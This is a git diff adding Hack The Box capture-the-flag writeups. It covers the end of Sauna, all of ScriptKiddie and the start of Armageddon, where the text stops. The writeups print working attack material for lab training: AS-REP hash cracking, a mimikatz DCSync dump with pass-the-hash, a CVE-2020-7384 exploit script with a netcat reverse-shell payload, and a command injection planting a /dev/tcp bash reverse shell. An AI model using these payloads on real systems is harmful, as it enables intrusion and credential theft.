+ $krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:e5fd4e219aaaeaaee831332f9757141c$4b7dc2211c0031d41c8667e233453527d9b0dd39176a4fcc15bbb9d7535e360a47f4c7f30e46e1afbf6ce3d27fca4f9c565dd47aa5896389bcd9a70e74ceb7ead43f5bc37be009d480bd404547ee634a22f161d599913a834ead66f05421ae2c5f550fb3334490cafebd10186b90a5343f5240cf901a033f0b3126c45e4e27f0f4514bf5367fc281e5bc826921b136ed7b995f9c1144f9a62f8d871806e3bbb07a3789bcedfa928409ac543b4ab30f024730b1d9ca818ceb99e6dfd064544eec1a530075004840b580afcfa3787a7c1c9012957d7c0b5ae53af8e845173509688166cbe140017a3b2076d583b1d496e42ef78b9e305edf5b43802c653ef6ab4d
+
+
+
+Now that we got fsmith's hashed password let's crack it with john:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → john output.txt -w=/usr/share/wordlists/rockyou.txt
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
+ Will run 4 OpenMP threads
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ **Thestrokes23 ($krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL)**
+ 1g 0:00:00:09 DONE (2021-06-08 09:54) 0.1102g/s 1161Kp/s 1161Kc/s 1161KC/s Thrall..Thehunter22
+ Use the "--show" option to display all of the cracked passwords reliably
+ Session completed
+
+
+And we got fsmith's password! Now let's use evil-winrm to get onto the box:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → evil-winrm -u fsmith -p Thestrokes23 -i egotistical-bank.local
+
+ Evil-WinRM shell v2.4
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\FSmith\Documents> cd ..
+ *Evil-WinRM* PS C:\Users\FSmith> ls
+
+
+ Directory: C:\Users\FSmith
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d-r--- 1/23/2020 10:01 AM Desktop
+ d-r--- 1/24/2020 10:40 AM Documents
+ d-r--- 9/15/2018 12:19 AM Downloads
+ d-r--- 9/15/2018 12:19 AM Favorites
+ d-r--- 9/15/2018 12:19 AM Links
+ d-r--- 9/15/2018 12:19 AM Music
+ d-r--- 9/15/2018 12:19 AM Pictures
+ d----- 9/15/2018 12:19 AM Saved Games
+ d-r--- 9/15/2018 12:19 AM Videos
+
+
+ *Evil-WinRM* PS C:\Users\FSmith> cd Desktop
+ *Evil-WinRM* PS C:\Users\FSmith\Desktop> ls
+
+
+ Directory: C:\Users\FSmith\Desktop
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 1/23/2020 10:03 AM 34 user.txt
+
+
+ *Evil-WinRM* PS C:\Users\FSmith\Desktop> cat user.txt
+ 1bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc let's use Invoke-winPEAS.ps1 from powershell empire:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Sauna]
+ → locate winPEAS.ps1
+ /home/nothing/HTB/Buff/Invoke-winPEAS.ps1
+ /home/nothing/HTB/Omni/SirepRAT/Invoke-winPEAS.ps1
+ /usr/share/powershell-empire/data/module_source/privesc/Invoke-winPEAS.ps1
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Sauna]
+ → cp /usr/share/powershell-empire/data/module_source/privesc/Invoke-winPEAS.ps1 .
+
+
+
+let's upload it to a temporary directory we create:
+
+
+ *Evil-WinRM* PS C:\Users\FSmith\Desktop> mkdir C:\Temp
+
+
+ Directory: C:\
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 6/8/2021 8:06 AM Temp
+
+
+ *Evil-WinRM* PS C:\Users\FSmith\Desktop> cd C:\Temp
+ *Evil-WinRM* PS C:\Temp>
+
+
+
+Then we can use evil-winrm's built in upload function:
+
+
+ *Evil-WinRM* PS C:\Temp> upload Invoke-winPEAS.ps1
+ Info: Uploading Invoke-winPEAS.ps1 to C:\Temp\Invoke-winPEAS.ps1
+
+
+ Data: 310740 bytes of 310740 bytes copied
+
+ Info: Upload successful!
+
+ *Evil-WinRM* PS C:\Temp> ls
+
+
+ Directory: C:\Temp
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 6/8/2021 8:07 AM 233056 Invoke-winPEAS.ps1
+
+
+
+Then just import the .ps1 file as a module then run the command:
+
+
+ *Evil-WinRM* PS C:\Temp> import-module ./Invoke-winPEAS.ps1
+ *Evil-WinRM* PS C:\Temp> Invoke-winPEAS
+
+
+
+` 
+
+Scrolling through the winPEAS output we see the following:
+
+
+
+So now we have svc_loanmgr's password, so let's spawn another evil-winrm session with his credentials:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → evil-winrm -u svc_loanmgr -p Moneymakestheworldgoround! -i egotistical-bank.local
+
+ Evil-WinRM shell v2.4
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami
+ egotisticalbank\svc_loanmgr
+
+
+
+As expected we managed to spawn a session as svc_loanmgr, now in order to privesc we're going to upload mimikatz
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Sauna]
+ → locate mimikatz.exe
+ /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe
+ /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
+
+
+ [term2]
+
+ *Evil-WinRM* PS C:\Users\svc_loanmgr> cd C:\Temp
+ *Evil-WinRM* PS C:\Temp> upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
+ Info: Uploading /usr/share/windows-resources/mimikatz/x64/mimikatz.exe to C:\Temp\mimikatz.exe
+
+
+ Data: 1773544 bytes of 1773544 bytes copied
+
+ Info: Upload successful!
+
+
+
+Now let's run it:
+
+
+ *Evil-WinRM* PS C:\Temp> .\mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"
+
+ .#####. mimikatz 2.2.0 (x64) #19041 May 31 2021 00:08:47
+ .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
+ ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
+ ## \ / ## > https://blog.gentilkiwi.com/mimikatz
+ '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
+ '#####' > https://pingcastle.com / https://mysmartlogon.com ***/
+
+ mimikatz(commandline) # lsadump::dcsync /user:Administrator
+ [DC] 'EGOTISTICAL-BANK.LOCAL' will be the domain
+ [DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
+ [DC] 'Administrator' will be the user account
+ [rpc] Service : ldap
+ [rpc] AuthnSvc : GSS_NEGOTIATE (9)
+
+ Object RDN : Administrator
+
+ ** SAM ACCOUNT **
+
+ SAM Username : Administrator
+ Account Type : 30000000 ( USER_OBJECT )
+ User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
+ Account expiration :
+ Password last change : 1/24/2020 10:14:15 AM
+ Object Security ID : S-1-5-21-2966785786-3096785034-1186376766-500
+ Object Relative ID : 500
+
+ Credentials:
+ **Hash NTLM: d9485863c1e9e05851aa40cbb4ab9dff**
+ ntlm- 0: d9485863c1e9e05851aa40cbb4ab9dff
+ ntlm- 1: 7facdc498ed1680c4fd1448319a8c04f
+ lm - 0: ee8c50e6bc332970a8e8a632488f5211
+
+ Supplemental Credentials:
+ * Primary:NTLM-Strong-NTOWF *
+ Random Value : caab2b641b39e342e0bdfcd150b1683e
+
+ * Primary:Kerberos-Newer-Keys *
+ Default Salt : EGOTISTICAL-BANK.LOCALAdministrator
+ Default Iterations : 4096
+ Credentials
+ aes256_hmac (4096) : 987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
+ aes128_hmac (4096) : 145e4d0e4a6600b7ec0ece74997651d0
+ des_cbc_md5 (4096) : 19d5f15d689b1ce5
+ OldCredentials
+ aes256_hmac (4096) : 9637f48fa06f6eea485d26cd297076c5507877df32e4a47497f360106b3c95ef
+ aes128_hmac (4096) : 52c02b864f61f427d6ed0b22639849df
+ des_cbc_md5 (4096) : d9379d13f7c15d1c
+
+ * Primary:Kerberos *
+ Default Salt : EGOTISTICAL-BANK.LOCALAdministrator
+ Credentials
+ des_cbc_md5 : 19d5f15d689b1ce5
+ OldCredentials
+ des_cbc_md5 : d9379d13f7c15d1c
+
+ * Packages *
+ NTLM-Strong-NTOWF
+
+ * Primary:WDigest *
+ 01 3fbea1ff422da035f1dc9b0ce45e84ea
+ 02 708091daa9db25abbd1d94246e4257e2
+ 03 417f2e40d5be8d436af749ed9fddb0b0
+ 04 3fbea1ff422da035f1dc9b0ce45e84ea
+ 05 50cb7cfb64edf83218804d934e30d431
+ 06 781dbcf7b8f9079382a1948f26f561ee
+ 07 4052111530264023a7d445957f5146e6
+ 08 8f4bffc5d94cc294272cd0c836e15c47
+ 09 0c81bc892ea87f7dd0f4a3a05b51f158
+ 10 f8c10a5bd37ea2568976d47ef12e55b9
+ 11 8f4bffc5d94cc294272cd0c836e15c47
+ 12 023b04503e3eef421de2fcaf8ba1297d
+ 13 613839caf0cf709da25991e2e5cb63cf
+ 14 16974c015c9905fb27e55a52dc14dfb0
+ 15 3c8af7ccd5e9bd131849990d6f18954b
+ 16 2b26fb63dcbf03fe68b67cdd2c72b6e6
+ 17 6eeda5f64e4adef4c299717eafbd2850
+ 18 3b32ec94978feeac76ba92b312114e2c
+ 19 b25058bc1ebfcac10605d39f65bff67f
+ 20 89e75cc6957728117eb1192e739e5235
+ 21 7e6d891c956f186006f07f15719a8a4e
+ 22 a2cada693715ecc5725a235d3439e6a2
+ 23 79e1db34d98ccd050b493138a3591683
+ 24 1f29ace4f232ebce1a60a48a45593205
+ 25 9233c8df5a28ee96900cc8b59a731923
+ 26 08c02557056f293aab47eccf1186c100
+ 27 695caa49e68da1ae78c1523b3442e230
+ 28 57d7b68bd2f06eae3ba10ca342e62a78
+ 29 3f14bb208435674e6a1cb8a957478c18
+
+
+ mimikatz(commandline) # exit
+ Bye!
+
+
+And we got the NTLM Hash! Let's use it to login as the Administrator user:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → evil-winrm -u Administrator -H "d9485863c1e9e05851aa40cbb4ab9dff" -i egotistical-bank.local
+
+ Evil-WinRM shell v2.4
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
+ egotisticalbank\administrator
+ *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
+ *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
+ f3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get an Administrator evil-winrm session and got the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/58.md b/Easy/58.md
new file mode 100644
index 0000000..4f2f639
--- /dev/null
+++ b/Easy/58.md
@@ -0,0 +1,396 @@
+# ScriptKiddie Writeup
+
+
+
+## Introduction :
+
+ScriptKiddie is an easy box released back in Febuary 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
+ → nmap -vvv -p- 10.10.10.226 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 22/tcp on 10.10.10.226
+ Discovered open port 5000/tcp on 10.10.10.226
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
+ | 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
+ |_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
+ 5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
+ |_http-title: k1d'5 h4ck3r t00l5
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 7.79 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 5000 so let's investigate it:
+
+
+
+There were alot of rabbitholes for this box early on, so here's the intended way:
+
+
+
+Basically here you see that you are able to upload an android template file, and there is an exploit for it called [CVE2020-7384](https://www.exploit-db.com/exploits/49491):
+
+
+
+So let's save it locally:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
+ → vim exploit.py
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
+ → cat exploit.py
+ #!/usr/bin/env python3
+ import subprocess
+ import tempfile
+ import os
+ from base64 import b64encode
+
+ # Change me
+ **payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2> &1|nc 10.10.14.13 9001 >/tmp/f'**
+
+ # b64encode to avoid badchars (keytool is picky)
+ payload_b64 = b64encode(payload.encode()).decode()
+ dname = f"CN='|echo {payload_b64} | base64 -d | sh #"
+
+ print(f"[+] Manufacturing evil apkfile")
+ print(f"Payload: {payload}")
+ print(f"-dname: {dname}")
+ print()
+
+ tmpdir = tempfile.mkdtemp()
+ apk_file = os.path.join(tmpdir, "evil.apk")
+ empty_file = os.path.join(tmpdir, "empty")
+ keystore_file = os.path.join(tmpdir, "signing.keystore")
+ storepass = keypass = "password"
+ key_alias = "signing.key"
+
+ # Touch empty_file
+ open(empty_file, "w").close()
+
+ # Create apk_file
+ subprocess.check_call(["zip", "-j", apk_file, empty_file])
+
+ # Generate signing key with malicious -dname
+ subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,
+ "-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])
+
+ # Sign APK using our malicious dname
+ subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,
+ "-storepass", storepass, "-keypass", keypass, apk_file, key_alias])
+
+ print()
+ print(f"[+] Done! apkfile is at {apk_file}")
+ print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")
+
+
+
+You can use this or we can just use metasploit:
+
+
+ msf6 > search venom apk
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection 2020-10-29 excellent No Rapid7 Metasploit Framework msfvenom APK Template Command Injection
+
+
+ Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
+
+ msf6 > use 0
+ [*] No payload configured, defaulting to cmd/unix/reverse_netcat
+ msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show options
+
+ Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ FILENAME msf.apk yes The APK file name
+
+
+ Payload options (cmd/unix/reverse_netcat):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ LHOST 10.0.0.10 yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+ **DisablePayloadHandler: True (no handler will be created!)**
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Automatic
+
+
+
+
+Let's setup the required options and generate the apk template:
+
+
+ msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST tun0
+ LHOST => tun0
+ msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 9002
+ LPORT => 9002
+ msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit
+
+ [+] msf.apk stored at /home/nothing/.msf4/local/msf.apk
+ msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exit
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
+ → cp /home/nothing/.msf4/local/msf.apk .
+
+
+
+Now let's prepare our netcat to catch the reverse shell on our port 9002, and upload the apk file:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/ScriptKiddie]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+
+
+
+` 
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/ScriptKiddie]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.226] 36670
+ id
+ uid=1000(kid) gid=1000(kid) groups=1000(kid)
+
+ cat ~/user.txt
+ 1dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And there you go! We have a reverse shell as the kid user, and thus we have been able to print the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now before we enumerate the box let's get a fully interactive TTY shell:
+
+
+ which python python3 wget curl
+ /usr/bin/python3
+ /usr/bin/wget
+ /usr/bin/curl
+
+ #spawn a TTY with python3
+
+ python3 -c 'import pty; pty.spawn("/bin/bash")'
+
+
+ #background the reverse shell process
+
+ kid@scriptkiddie:~/html$ ^Z
+ [1] + 3083589 suspended nc -lvnp 9002
+
+
+ #set stty raw and foreground the process
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/ScriptKiddie]
+ → stty raw -echo ; fg
+ [1] + 3083589 continued nc -lvnp 9002
+
+ #export the SHELL and TERM variables
+
+ kid@scriptkiddie:~/html$ export SHELL=bash
+ kid@scriptkiddie:~/html$ export TERM=screen-256color
+
+ #set the TTY rows and columns for vi / nano
+ kid@scriptkiddie:~/html$ stty rows 40 columns 125
+ kid@scriptkiddie:~/html$ reset
+
+
+
+Now that we have a fully interactive TTY shell let's upload linpeas onto the box:
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+ [term2]
+
+ kid@scriptkiddie:~/html$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
+ --2021-06-08 12:04:57-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[====================================================>] 333.85K 2.03MB/s in 0.2s
+
+ 2021-06-08 12:04:57 (2.03 MB/s) - ‘/tmp/peas.sh’ saved [341863/341863]
+
+ kid@scriptkiddie:~/html$ chmod +x /tmp/peas.sh
+ kid@scriptkiddie:~/html$ /tmp/peas.sh
+
+
+
+` 
+
+Scrolling through the output we see that there is another user on the box named **pwn** :
+
+
+
+So let's take a look at his home directory:
+
+
+ kid@scriptkiddie:~/html$ ls -lash /home/pwn
+ total 44K
+ 4.0K drwxr-xr-x 6 pwn pwn 4.0K Feb 3 12:06 .
+ 4.0K drwxr-xr-x 4 root root 4.0K Feb 3 07:40 ..
+ 0 lrwxrwxrwx 1 root root 9 Feb 3 12:06 .bash_history -> /dev/null
+ 4.0K -rw-r--r-- 1 pwn pwn 220 Feb 25 2020 .bash_logout
+ 4.0K -rw-r--r-- 1 pwn pwn 3.7K Feb 25 2020 .bashrc
+ 4.0K drwx------ 2 pwn pwn 4.0K Jan 28 17:08 .cache
+ 4.0K drwxrwxr-x 3 pwn pwn 4.0K Jan 28 17:24 .local
+ 4.0K -rw-r--r-- 1 pwn pwn 807 Feb 25 2020 .profile
+ 4.0K -rw-rw-r-- 1 pwn pwn 74 Jan 28 16:22 .selected_editor
+ 4.0K drwx------ 2 pwn pwn 4.0K Feb 10 16:10 .ssh
+ 4.0K drwxrw---- 2 pwn pwn 4.0K Feb 3 12:00 recon
+ 4.0K -rwxrwxr-- 1 pwn pwn 250 Jan 28 17:57 scanlosers.sh
+ kid@scriptkiddie:~/html$ cd /home/pwn
+ kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
+ #!/bin/bash
+
+ log=/home/kid/logs/hackers
+
+ cd /home/pwn/
+ cat $log | cut -d' ' -f3- | sort -u | while read ip; do
+ sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
+ done
+
+ if [[ $(wc -l <****$log) -gt 0 ]]; then echo -n > $log; fi
+
+Here we see that there is a bashscript that takes a logfile from **/home/kid/logs/hackers** it, gets ip addresses from it and runs nmap against each of them. However the input isn't being sanitized, so let's use it to get a reverse shell:
+
+
+ kid@scriptkiddie:/home/pwn$ echo -n "Z Y 10.10.14.13;/bin/bash -c 'bash >& /dev/tcp/10.10.14.13/9003 0>&1' #" >/home/kid/logs/hackers
+
+
+And as soon as we run it we have a reverse shell connection:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/48 ] [~/HTB/ScriptKiddie]
+ → nc -lvnp 9003
+ listening on [any] 9003 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.226] 53822
+ id
+ uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)
+
+
+
+This time we get access to the pwn user, So let's spawn a fully interactive TTY just like we previously did:
+
+
+ python3 -c 'import pty; pty.spawn("/bin/bash")'
+ pwn@scriptkiddie:~$ ^Z
+ [1] + 3150958 suspended nc -lvnp 9003
+
+ [ 10.10.14.13/23 ] [ /dev/pts/48 ] [~/HTB/ScriptKiddie]
+ → stty raw -echo ; fg
+ [1] + 3150958 continued nc -lvnp 9003
+ export TERM=screen-256color
+ pwn@scriptkiddie:~$ export SHELL=bash
+ pwn@scriptkiddie:~$ stty rows 40 columns 200
+ pwn@scriptkiddie:~$ reset
+
+
+Now we run linpeas once again:
+
+
+ pwn@scriptkiddie:~$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh ; chmod +x /tmp/peas.sh ; /tmp/peas.sh
+
+
+
+This time we see the following:
+
+
+
+Apparently the pwn user can run **metasploit** as the root user, so let's do it:
+
+
+ pwn@scriptkiddie:~$ sudo -l
+ Matching Defaults entries for pwn on scriptkiddie:
+ env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User pwn may run the following commands on scriptkiddie:
+ (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
+ pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
+
+ pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
+
+
+ .:okOOOkdc' 'cdkOOOko:.
+ .xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
+ :OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
+ 'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
+ oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo
+ dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx
+ lOOOOOOOO. ;d; ,OOOOOOOOl
+ .OOOOOOOO. .; ; ,OOOOOOOO.
+ cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc
+ oOOOOOO. .OOOO. :OOOO. ,OOOOOOo
+ lOOOOO. .OOOO. :OOOO. ,OOOOOl
+ ;OOOO' .OOOO. :OOOO. ;OOOO;
+ .dOOo .OOOOocccxOOOO. xOOd.
+ ,kOl .OOOOOOOOOOOOO. .dOk,
+ :kk;.OOOOOOOOOOOOO.cOk:
+ ;kOOOOOOOOOOOOOOOk:
+ ,xOOOOOOOOOOOx,
+ .lOOOOOOOl.
+ ,dOd,
+ .
+
+ =[ metasploit v6.0.9-dev ]
+ + -- --=[ 2069 exploits - 1122 auxiliary - 352 post ]
+ + -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ + -- --=[ 7 evasion ]
+
+ Metasploit tip: Display the Framework log using the log command, learn more with help log
+
+ msf6 > bash
+ [*] exec: bash
+
+ root@scriptkiddie:/home/pwn# id
+ uid=0(root) gid=0(root) groups=0(root)
+ root@scriptkiddie:/home/pwn# cat /root/root.txt
+ 87XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And there you go! We managed to get a root shell and print the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/59.md b/Easy/59.md
new file mode 100644
index 0000000..af082d4
--- /dev/null
+++ b/Easy/59.md
@@ -0,0 +1,419 @@
+# Armageddon Writeup
+
+
+
+## Introduction :
+
+Armageddon is an easy Linux box released back in March 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.49/23 ] [ /dev/pts/3 ] [~/HTB/Armagueddon]
+ → nmap -sCV 10.129.48.89
+
+ [ 10.10.14.49/23 ] [ /dev/pts/3 ] [~/HTB/Armagueddon]
+ → nmap -vvv -p- 10.129.48.89 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 80/tcp on 10.129.48.89
+ Discovered open port 22/tcp on 10.129.48.89
+
+ [ 10.10.14.49/23 ] [ /dev/pts/3 ] [~/HTB/Armagueddon]
+ → nmap -sCV -p 22,80 10.129.48.89
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-05 14:39 CEST
+ Nmap scan report for 10.129.48.89
+ Host is up (0.46s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
+ | 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
+ |_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
+ 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
+ |_http-generator: Drupal 7 (http://drupal.org)
+ | http-robots.txt: 36 disallowed entries (15 shown)
+ | /includes/ /misc/ /modules/ /profiles/ /scripts/
+ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
+ | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
+ |_/LICENSE.txt /MAINTAINERS.txt
+ |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
+ |_http-title: Welcome to Armageddon | Armageddon
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 24.34 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+Just as like what we saw in our nmap scan results, this is a website running Drupal, and when we take a look at the page sourcecode we see get the confirmation that this is a Drupal 7 instance:
+
+
+
+Now in order to exploit it we can use [Drupalgeddon2](https://github.com/dreadlocked/Drupalgeddon2)
+
+
+ [ 10.10.14.49/23 ] [ /dev/pts/3 ] [~/HTB/Armagueddon]
+ → git clone https://github.com/dreadlocked/Drupalgeddon2
+ Cloning into 'Drupalgeddon2'...
+ remote: Enumerating objects: 257, done.
+ remote: Counting objects: 100% (4/4), done.
+ remote: Compressing objects: 100% (4/4), done.
+ remote: Total 257 (delta 0), reused 0 (delta 0), pack-reused 253
+ Receiving objects: 100% (257/257), 102.12 KiB | 202.00 KiB/s, done.
+ Resolving deltas: 100% (88/88), done.
+
+ [ 10.10.14.49/23 ] [ /dev/pts/3 ] [~/HTB/Armagueddon]
+ → cd Drupalgeddon2
+
+ [ 10.10.14.49/23 ] [ /dev/pts/3 ] [HTB/Armagueddon/Drupalgeddon2]
+ → ls -l
+ total 44
+ -rwxr-xr-x 1 nothing nothing 7262 Aug 5 15:39 drupalgeddon2-customizable-beta.rb
+ -rwxr-xr-x 1 nothing nothing 22954 Aug 5 15:39 drupalgeddon2.rb
+ -rw-r--r-- 1 nothing nothing 11388 Aug 5 15:39 README.md
+
+
+
+In order to run it we need the **highline** ruby gem:
+
+
+ [ 10.10.14.49/23 ] [ /dev/pts/3 ] [HTB/Armagueddon/Drupalgeddon2]
+ → sudo gem install highline
+ [sudo] password for nothing:
+ Fetching highline-2.0.3.gem
+ Successfully installed highline-2.0.3
+ Parsing documentation for highline-2.0.3
+ Installing ri documentation for highline-2.0.3
+ Done installing documentation for highline after 2 seconds
+ 1 gem installed
+
+
+
+Once that's done we run it:
+
+
+ [ 10.10.14.49/23 ] [ /dev/pts/3 ] [HTB/Armagueddon/Drupalgeddon2]
+ → ./drupalgeddon2.rb http://10.129.48.89
